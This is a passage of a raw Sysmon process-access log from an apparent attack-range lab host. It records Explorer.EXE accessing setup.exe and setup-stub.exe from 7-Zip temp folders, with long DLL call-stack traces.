A8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
